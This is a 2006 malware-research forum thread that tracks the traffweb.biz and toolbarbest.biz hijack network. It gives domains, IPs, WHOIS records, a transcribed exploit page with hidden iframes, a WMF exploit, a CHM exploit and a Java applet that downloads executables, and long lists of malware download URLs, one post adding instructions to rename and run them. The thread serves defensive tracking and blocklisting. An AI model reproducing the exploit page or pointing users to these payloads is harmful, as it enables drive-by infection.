B.I.S.S. Forums > traffweb.biz | toolbarbest.biz hijacks

Help - Search - Members - Calendar

Full Version: traffweb.biz | toolbarbest.biz hijacks

B.I.S.S. Forums > Malware Research Forum > Malware IP Research Section

Moore

Mar 7 2006, 03:17 PM

Found a few interesting hijacks today , please dont follow any of these links ..

in order of appearance :

QUOTE

.www. icoocash.com 38.113.207.59
iframe.adultfriendfinder.com 64.156.213.198
images.streamray.com 64.156.213.227
toolbarmoney.biz 85.249.23.117
traffweb.biz 85.249.23.119

8 domains found on traffweb.biz = 85.249.23.119

CODE

www.Traffbest.biz
.www.Traffbucks.biz
.www.Traffcool.biz
.www.Traffdollars.biz
.www.Traffmoney.biz
.www.Traffnew.biz
.www.Traffsale1.biz
.www.Traffweb.biz

QUOTE

Domain Name:    TRAFFWEB.BIZ
Domain ID:    D12386987-BIZ
Sponsoring Registrar: TLDS INC.
Sponsoring Registrar IANA ID: 320
Domain Status:    clientTransferProhibited
Registrant ID:    6511608-SRSPLUS
Registrant Name:    Jason Coffman
Registrant Organization:    Private person
Registrant Address1:    908 Alder St
Registrant City:    Philadelphia
Registrant State/Province:    PA
Registrant Postal Code: 19147
Registrant Country: United States
Registrant Country Code:    US
Registrant Phone Number:    +1.74952171179
Registrant Email: admin@toolbarbest.biz

toolbarbest.biz = 85.249.23.117

ns1.toolbarbest.biz = 85.249.23.115
ns2.toolbarbest.biz = 85.249.23.116

QUOTE

domains found on 85.249.23.117

www .Iframecash.biz
www .Toolbarbest.biz
www .Toolbarbucks.biz
www .Toolbarcool.biz
www .Toolbardollars.biz
www .Toolbarmoney.biz
www .Toolbarnew.biz
www .Toolbarsale.biz
www .Toolbarweb.biz

QUOTE

Domain Name:    TOOLBARBEST.BIZ
Domain ID:    D11890133-BIZ
Sponsoring Registrar: TLDS INC.
Sponsoring Registrar IANA ID: 320
Domain Status:    clientTransferProhibited
Registrant ID:    6488994-SRSPLUS
Registrant Name:    Alexander Pushkin
Registrant Organization:    Home Home
Registrant Address1:    Pushkina str. - 1 - 1
Registrant City:    Moscow
Registrant Postal Code: 123456
Registrant Country: Russian Federation
Registrant Country Code:    RU
Registrant Phone Number:    +78.462788201
Registrant Email:admin@newtoolbar.biz

logged this a bit later while the computer was idle lol ?

QUOTE

12:35:20 AM update.firefoxupdatecenter.net New record 64.71.167.

118
12:35:21 AM ftp.icq.com New record 207.200.66.53
12:35:41 AM www.getlotto.net New record 69.57.146.81
12:36:47 AM www.viagra.com New record 63.236.70.136
12:36:51 AM www.cocaine.org New record 195.82.124.124
12:46:53 AM www.answers.com New record 208.39.44.164

More update.firefoxupdatecenter.net details:
http://www.short-media.com/forum/showthread.php?t=43066

-----------------------------------------------

Assorted links involved in this hijack and some others I collected on the way :

QUOTE

http://85.255.113.10/favicon.ico
http ://85.255.113.10/?to=nan99&from=in
http ://85.255.113.22/inc/nan99.html
hxxp ://85.255.113.10/?to=uncle6&from=in
hxxp ://85.255.113.22/inc/uncle6.html
hxxp ://69.50.190.131/?to=HANGMANIO&from=beli&type=beli
http ://69.50.176.174/ts/in.cgi?ad13&nisha
hxxp ://216.255.186.77/split.php?id=hangall
hxxp ://85.255.113.22/inc/thangall.html
hxxp ://toolbarmoney.biz/dl/adv645.php

hxxp ://traffweb.biz/dl/xpladv799.wmf - shite

hxxp ://traffweb.biz/dl/fillmemadv799.htm
hxxp ://traffweb.biz/dl/loaderadv799.jar
hxxp ://traffweb.biz/dl/java.jar
hxxp ://traffweb.biz/dl/bag.htm
hxxp ://traffweb.biz/dl/error.php - iframe loads hijack

error.php

QUOTE

html
body

iframe src= xpladv799.wmf width=1 height=1 iframe
applet archive="java.jar" code=" GetAccess.class " width=1 height=1

param name="ModulePath"
value="hxxp:// traffweb.biz/dl/loaderadv799_2.exe
applet>

iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm><iframe
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm>/iframe
iframe width=1 height=1 border=0 frameborder=0
src=fillmemadv799.htm iframe
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm>/iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm><iframe>
iframe width=1 height=1 border=0 frameborder=0 src=bag.htm
iframe

applet width=1 height=1 ARCHIVE=loaderadv799.jar code=Counter

APPLET

SCRIPT LANGUAGE=JavaScript

obj = object data= \ ms-its : mhtml:file
obj1 = :// C: \\ nosuch.mht ! hxxp:// traffweb.biz/dl/adv799/ x. chm :: / x. htm \ type= \ text/x-scriptlet\
object
document.write(obj+obj1)
script
body
html

inside loaderadv799.jar is matrix.class containing:

QUOTE

java/net/URL hxxp://traffweb.biz/dl/loaderadv799_4.exe
\loadnew.exe java/lang/String hxxp://traffweb.biz/dl/cheat.php?adv=adv799

hxxp ://traffweb.biz/dl/loaderadv799_4.exe
hxxp ://traffweb.biz/dl/cheat.php?adv=adv799

Loadnew.exe hxxp ://traffweb.biz/progs/secure32.php
Loadnew.exe hxxp ://traffweb.biz/progs/paytime.txt
Loadnew.exe hxxp ://traffweb.biz/progs/toolbar.txt
Loadnew.exe hxxp ://traffweb.biz/progs/tool1.txt

--

hxxp://traffweb.biz/progs/toolbar.txt = toolbar.exe

code inside toolbar.exe contains :

QUOTE

C l i c k h e r e t o a g r e e t h i s d o w n l o a d . . .?0

?.hxxp://eula.dollarrevenue.com/eula.asp?id=103 0

-----

hxxp ://traffweb.biz/progs/paytime.txt = paytime.exe

TrojanHunter = Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\hijack\march\\trafficbiz\\paytime.rar/paytime.exe (StartPage.148)

QUOTE

C o m p a n y N a m e M i c r o s o f t C o r p o r a t i o n : F i l e D e s c r i p t i o n e x p l o r e r 6
F i l e V e r s i o n 2 , 5 , 1 , 1 6 0 0 2 I n t e r n a l N m e e x p l o r e r p & L e g a l C o p y r i g h t C o p y r i g h t M i c r o s o f t C o r p o r a t i o n ? 2 0 0 5 ( L e g a l T r a d e m a r k s B O r i g i n a l F i l e n a m e e x p l o r e r . e x e P r i v a t e B u i l d @ P r o d u c t N a m e e x p l o r e r h e l p e r :

-----

-

hxxp://traffweb.biz/progs/secure32.php - desktop wallpaper hijack

TrojanHunter = Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\hijack march\\trafficbiz\\secure32.html (Harnig.103)

--

hxxp://traffweb.biz/favicon.ico
hxxp://traffweb.biz/progs/tool1.txt - tool1.exe
hxxp://traffweb.biz/progs/tool2.txt - tool2.exe
hxxp://traffweb.biz/progs/tool3.txt - tool3.exe

hxxp://traffweb.biz/progs/country.php - country.htm / country.exe

-

Loadnew.exe runs hxxp://traffweb.biz/progs/tool2.txt

TDS-3 Positive identification: TrojanDropper.Win32.Small.abm
File:c:\documentsandsettings\spywarekiller\desktop\hijack\march\trafficbiz\loadnew.exe

loadnew.exe
loaderadv799.jar
kl1.exe
uniq

----

More info here:
http://www.bleedingsnort.com/forum/viewtop...&showtopic=1671

Great analysis here :
http://www.wilderssecurity.com/showthread.php?p=693007

back soon with full scans , logs and yes pictures too.

fe_de_7

Mar 7 2006, 03:56 PM

Well done man!

TeMerc

Mar 20 2006, 11:08 PM

Some cool stuff no doubt.

For giggles and grins I decided to go a bunch of those to see what would happen.

My test box has XPSP2, fully patched w\Spy Sweeper, WinPatrol, ZA and AntiiVir.

Uninstalled hosts file and IE-SPYAD.

SS and SiteAdvisor, both blocked access to several of those sites so I disabled them as well.

Running InCtrl now will post back if anything is found.

Moore

Mar 20 2006, 11:18 PM

Hey thats the spirit Temerc

LOL.. did you notice any other sites not listed here at all ?

TeMerc

Mar 27 2006, 05:20 PM

Sorry for the long delay in replying back to this topic.

Got involved with another box I'm kinda repairing for a friend.

But anyway, after going to these sites and trying to get InCtrl log, the box froze and I lost the info.

Regardless, I ran all the scanners and log generators and nothing was found. Granted this is on a fully patched XP SP2 box but it's always interesting to me that users who are patched, even with minimal or no security, aside from av an fw can still come out clean when visiting some of these sites.

I hope to be getting another box fixed up soon so I can do some more testing and malware type fun stuff. And that box will be a 'sacrificial lamb' s the case may be, with no patches to get the full effect.

Will report back here when that happens.

Webhelper

Mar 28 2006, 05:37 AM

QUOTE (TeMerc @ Mar 27 2006, 05:20 PM)

At this groups sites, they run a wmf and chm exploit to run a loader file. You would need to get their installer and run it to get the full effect. Or you can download from their wwise.biz site all the *.txt and rename them to *.exe and then run their individual installers:

wwise.biz/progs/au.txt
wwise.biz/progs/de.txt
wwise.biz/progs/hosts.txt
wwise.biz/progs/it.txt
wwise.biz/progs/kl.txt
wwise.biz/progs/ms1.txt
wwise.biz/progs/paytime.txt
wwise.biz/progs/secure32.html
wwise.biz/progs/tool1.txt
wwise.biz/progs/tool2.txt
wwise.biz/progs/tool3.txt
wwise.biz/progs/tool4.txt
wwise.biz/progs/tool5.txt
wwise.biz/progs/toolbar.txt
wwise.biz/progs/us.txt

For the traff4all.biz aka game4all.biz you would run any of their win32.exe :

traff4all.biz/adv/113/win32.exe
traff4all.biz/adv/058/win32.exe
traff4all.biz/adv/064/win32.exe
traff4all.biz/adv/180/win32.exe
traff4all.biz/adv/191/win32.exe
traff4all.biz/adv/067/win32.exe
traff4all.biz/adv/172/win32.exe
traff4all.biz/adv/078/win32.exe
traff4all.biz/adv/107/win32.exe
traff4all.biz/adv/154/win32.exe
traff4all.biz/adv/041/win32.exe
traff4all.biz/adv/111/win32.exe
traff4all.biz/adv/129/win32.exe
traff4all.biz/adv/074/win32.exe
traff4all.biz/adv/032/win32.exe
traff4all.biz/adv/114/win32.exe
traff4all.biz/adv/071/win32.exe
traff4all.biz/adv/097/win32.exe
traff4all.biz/adv/069/win32.exe
traff4all.biz/adv/188/win32.exe
traff4all.biz/adv/013/win32.exe
traff4all.biz/adv/167/win32.exe
traff4all.biz/adv/126/win32.exe
traff4all.biz/adv/091/win32.exe
traff4all.biz/adv/083/win32.exe
traff4all.biz/adv/115/win32.exe
traff4all.biz/adv/021/win32.exe
traff4all.biz/adv/108/win32.exe
traff4all.biz/adv/012/win32.exe
traff4all.biz/adv/075/win32.exe
traff4all.biz/adv/166/win32.exe
traff4all.biz/adv/176/win32.exe
traff4all.biz/adv/135/win32.exe
traff4all.biz/adv/160/win32.exe
traff4all.biz/adv/095/win32.exe
traff4all.biz/adv/102/win32.exe
traff4all.biz/adv/057/win32.exe
traff4all.biz/adv/165/win32.exe
traff4all.biz/adv/022/win32.exe
traff4all.biz/adv/145/win32.exe
traff4all.biz/adv/044/win32.exe
traff4all.biz/adv/098/win32.exe
traff4all.biz/adv/142/win32.exe
traff4all.biz/adv/155/win32.exe
traff4all.biz/adv/051/win32.exe
traff4all.biz/adv/178/win32.exe
traff4all.biz/adv/019/win32.exe
traff4all.biz/adv/181/win32.exe
traff4all.biz/adv/159/win32.exe
traff4all.biz/adv/072/win32.exe
traff4all.biz/adv/132/win32.exe
traff4all.biz/adv/073/win32.exe
traff4all.biz/adv/190/win32.exe
traff4all.biz/adv/136/win32.exe
traff4all.biz/adv/133/win32.exe
traff4all.biz/adv/017/win32.exe
traff4all.biz/adv/077/win32.exe
traff4all.biz/adv/123/win32.exe
traff4all.biz/adv/039/win32.exe
traff4all.biz/adv/045/win32.exe
traff4all.biz/adv/059/win32.exe
traff4all.biz/adv/080/win32.exe
traff4all.biz/adv/085/win32.exe
traff4all.biz/adv/137/win32.exe
traff4all.biz/adv/144/win32.exe
traff4all.biz/adv/152/win32.exe
traff4all.biz/adv/089/win32.exe
traff4all.biz/adv/068/win32.exe
traff4all.biz/adv/127/win32.exe
traff4all.biz/adv/153/win32.exe
traff4all.biz/adv/101/win32.exe
traff4all.biz/adv/028/win32.exe
traff4all.biz/adv/090/win32.exe
traff4all.biz/adv/082/win32.exe
traff4all.biz/adv/099/win32.exe
traff4all.biz/adv/109/win32.exe
traff4all.biz/adv/119/win32.exe
traff4all.biz/adv/079/win32.exe
traff4all.biz/adv/046/win32.exe
traff4all.biz/adv/141/win32.exe
traff4all.biz/adv/081/win32.exe
traff4all.biz/adv/052/win32.exe
traff4all.biz/adv/187/win32.exe
traff4all.biz/adv/143/win32.exe
traff4all.biz/adv/162/win32.exe
traff4all.biz/adv/161/win32.exe
traff4all.biz/adv/050/win32.exe
traff4all.biz/adv/060/win32.exe
traff4all.biz/adv/026/win32.exe
traff4all.biz/adv/147/win32.exe
traff4all.biz/adv/027/win32.exe
traff4all.biz/adv/056/win32.exe
traff4all.biz/adv/151/win32.exe
traff4all.biz/adv/016/win32.exe
traff4all.biz/adv/015/win32.exe
traff4all.biz/adv/104/win32.exe
traff4all.biz/adv/173/win32.exe
traff4all.biz/adv/049/win32.exe
traff4all.biz/adv/088/win32.exe
traff4all.biz/adv/130/win32.exe
traff4all.biz/adv/043/win32.exe
traff4all.biz/adv/031/win32.exe
traff4all.biz/adv/170/win32.exe
traff4all.biz/adv/116/win32.exe
traff4all.biz/adv/092/win32.exe
traff4all.biz/adv/117/win32.exe
traff4all.biz/adv/158/win32.exe
traff4all.biz/adv/055/win32.exe
traff4all.biz/adv/139/win32.exe
traff4all.biz/adv/084/win32.exe
traff4all.biz/adv/149/win32.exe
traff4all.biz/adv/033/win32.exe
traff4all.biz/adv/118/win32.exe
traff4all.biz/adv/124/win32.exe
traff4all.biz/adv/157/win32.exe
traff4all.biz/adv/112/win32.exe
traff4all.biz/adv/174/win32.exe
traff4all.biz/adv/150/win32.exe
traff4all.biz/adv/156/win32.exe
traff4all.biz/adv/076/win32.exe
traff4all.biz/adv/062/win32.exe
traff4all.biz/adv/094/win32.exe
traff4all.biz/adv/047/win32.exe
traff4all.biz/adv/038/win32.exe
traff4all.biz/adv/140/win32.exe
traff4all.biz/adv/054/win32.exe
traff4all.biz/adv/183/win32.exe
traff4all.biz/adv/042/win32.exe
traff4all.biz/adv/020/win32.exe
traff4all.biz/adv/065/win32.exe
traff4all.biz/adv/146/win32.exe
traff4all.biz/adv/014/win32.exe
traff4all.biz/adv/163/win32.exe
traff4all.biz/adv/186/win32.exe
traff4all.biz/adv/169/win32.exe
traff4all.biz/adv/148/win32.exe
traff4all.biz/adv/131/win32.exe
traff4all.biz/adv/103/win32.exe
traff4all.biz/adv/179/win32.exe
traff4all.biz/adv/096/win32.exe
traff4all.biz/adv/120/win32.exe
traff4all.biz/adv/018/win32.exe
traff4all.biz/adv/185/win32.exe
traff4all.biz/adv/182/win32.exe
traff4all.biz/adv/171/win32.exe
traff4all.biz/adv/030/win32.exe
traff4all.biz/adv/011/win32.exe
traff4all.biz/adv/105/win32.exe
traff4all.biz/adv/093/win32.exe
traff4all.biz/adv/138/win32.exe
traff4all.biz/adv/029/win32.exe
traff4all.biz/adv/070/win32.exe
traff4all.biz/adv/121/win32.exe
traff4all.biz/adv/048/win32.exe
traff4all.biz/adv/066/win32.exe
traff4all.biz/adv/053/win32.exe
traff4all.biz/adv/184/win32.exe
traff4all.biz/adv/040/win32.exe
traff4all.biz/adv/175/win32.exe
traff4all.biz/adv/061/win32.exe
traff4all.biz/adv/189/win32.exe
traff4all.biz/adv/168/win32.exe
traff4all.biz/adv/125/win32.exe
traff4all.biz/adv/106/win32.exe
traff4all.biz/adv/128/win32.exe
traff4all.biz/adv/122/win32.exe
traff4all.biz/adv/087/win32.exe
traff4all.biz/adv/164/win32.exe
traff4all.biz/adv/134/win32.exe
traff4all.biz/adv/177/win32.exe
traff4all.biz/adv/063/win32.exe
traff4all.biz/adv/036/win32.exe
traff4all.biz/adv/035/win32.exe
traff4all.biz/adv/034/win32.exe
traff4all.biz/adv/086/win32.exe
traff4all.biz/adv/037/win32.exe

Have fun:
webhelper

Moore

Mar 28 2006, 07:11 AM

I wonder what you've been up to lately ..

.. thanks Webhelper , great stuff as always..

Webhelper

Apr 4 2006, 01:27 AM

QUOTE (Moore @ Mar 7 2006, 03:17 PM)

Found a few interesting hijacks today , please dont follow any of these links ..

in order of appearance :

8 domains found on traffweb.biz = 85.249.23.119

CODE

www.Traffbest.biz
.www.Traffbucks.biz
.www.Traffcool.biz
.www.Traffdollars.biz
.www.Traffmoney.biz
.www.Traffnew.biz
.www.Traffsale1.biz
.www.Traffweb.biz

toolbarbest.biz = 85.249.23.117

ns1.toolbarbest.biz = 85.249.23.115
ns2.toolbarbest.biz = 85.249.23.116

logged this a bit later while the computer was idle lol ?

More update.firefoxupdatecenter.net details:
http://www.short-media.com/forum/showthread.php?t=43066

-----------------------------------------------

Assorted links involved in this hijack and some others I collected on the way :

error.php

inside loaderadv799.jar is matrix.class containing:

hxxp ://traffweb.biz/dl/loaderadv799_4.exe
hxxp ://traffweb.biz/dl/cheat.php?adv=adv799

Loadnew.exe hxxp ://traffweb.biz/progs/secure32.php
Loadnew.exe hxxp ://traffweb.biz/progs/paytime.txt
Loadnew.exe hxxp ://traffweb.biz/progs/toolbar.txt
Loadnew.exe hxxp ://traffweb.biz/progs/tool1.txt

--

hxxp://traffweb.biz/progs/toolbar.txt = toolbar.exe

code inside toolbar.exe contains :

-----

hxxp ://traffweb.biz/progs/paytime.txt = paytime.exe

TrojanHunter = Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\hijack\march\\trafficbiz\\paytime.rar/paytime.exe (StartPage.148)

-----

-

hxxp://traffweb.biz/progs/secure32.php - desktop wallpaper hijack

TrojanHunter = Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\hijack march\\trafficbiz\\secure32.html (Harnig.103)

--

hxxp://traffweb.biz/favicon.ico
hxxp://traffweb.biz/progs/tool1.txt - tool1.exe
hxxp://traffweb.biz/progs/tool2.txt - tool2.exe
hxxp://traffweb.biz/progs/tool3.txt - tool3.exe

We will need to update this as this group is now using a new format for their distribution of their trojan installers. They have two main new folders and folders with gibberish type names and files that look random named with no extentions but when downloaded along with their standard tool#.txt, ms1.txt, etc and their MD5s pretty much match each other.

The following are the sites we will need to get installs from to get enough sampling data to see what transmissions show and then again a week later to see if the naming conventions are random or static for each.

Right now is is only the traff*.biz sites that are starting to put together their new format but I have a feeling it won't be long till the rest starts up also.

I will have more on this in the next couple of days so I know exactly what they are doing with the new format and file naming formats. The end result would still show the tool#.exe and other files, however, they are placing them into the root of C:, Program Files root, and in the windows and system folders and loading a large number of temp files as a process.

1-extreme.biz
2-extreme.biz
3-extreme.biz
4-extreme.biz
5-extreme.biz
6-extreme.biz
7-extreme.biz
8-extreme.biz
wwise.biz
traffbest.biz
traffbucks.biz
traffcool.biz
traffdollars.biz
traffmoney.biz
traffnew.biz
traffsale1.biz
traffweb.biz

Moore

Apr 4 2006, 04:26 AM

Thanks..

Added their new IP to the blocklist and looks like Kim's already added the sites to the Hosts file.

9 domains found on 85.249.19.122

Will see if I can get some samples tonight.

Bronxie

Apr 12 2006, 09:28 PM

Nowthen! hey i was just wondering how the hell do u manage to gather all this ace info regarding Bad Ars sites? well keep it up anyway!!

1 other Q? do you know when ur explaining some address's where some of the pages have maliscious code's on?

eg! hxxp://traffweb.biz/progs/tool1.txt - tool1.exe
hxxp ://traffweb.biz/dl/loaderadv799.jar
hxxp ://traffweb.biz/dl/cheat.php?adv=adv799 .. etc!! well i was wondering can you copy and paist these lines and other simular lines into say my own ipfilter.p2p file and will protowall or PG2 block them or do i have to convert them into actual ip address's?

firstaid

Apr 13 2006, 01:39 AM

Most findings come from investigating and reporting of logs of boxes that have suspected Malware on them.

Most of these go into the Hosts file, that way you know they are not gonna connect to you. If you do not run a Hosts file for blocking I think you should consider it. All these bad guys get added to it, and once cet up correctly you do not even notice it running. Check it out in the Hosts section of the forum. And also look into installing the Hosts file Manager if you have not. Make sure you read about turning DNS services off on your box if you do.

And to answer your other Question, you could copy and paste these into something and get there ip into protowall, but I think most are in already. Most get put in the spyware list. http://www.bluetack.co.uk/config/spyware.txt

firstaid

Bronxie

Apr 14 2006, 10:34 PM

good work lads! by the way u can use all the links in avast url web blocker! wich ads even more security incase any1 stumble across these sites!

Webhelper

Apr 15 2006, 08:06 AM

QUOTE (Bronxie @ Apr 14 2006, 10:34 PM)

good work lads! by the way u can use all the links in avast url web blocker! wich ads even more security incase any1 stumble across these sites!

blocking is for the genral internet public. I for one can not afford to be blocked or you wouldn't read the files I write about

Webhelper

May 15 2006, 08:59 PM

They are on the move again since the weekend.

Active New
85.249.23.119 traffmoney1.biz
85.249.23.119 traffnew1.biz
85.249.23.119 traffweb1.biz

Replaced Now In Active
85.249.23.119 traffmoney.biz
85.249.23.119 traffnew.biz
85.249.23.119 traffweb.biz

I give them a few days more and we will probably see these go inactive and new ones with a 1 in the domain name.
85.249.23.119 traffbest.biz
85.249.23.119 traffbucks.biz
85.249.23.119 traffcool.biz
85.249.23.119 traffdollars.biz

Kimberly

May 15 2006, 09:24 PM

Thanks for letting us know Webhelper, I'll check out which are listed and which ain't. The IP remains the same for the lists, but I have to check the hosts file tho.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.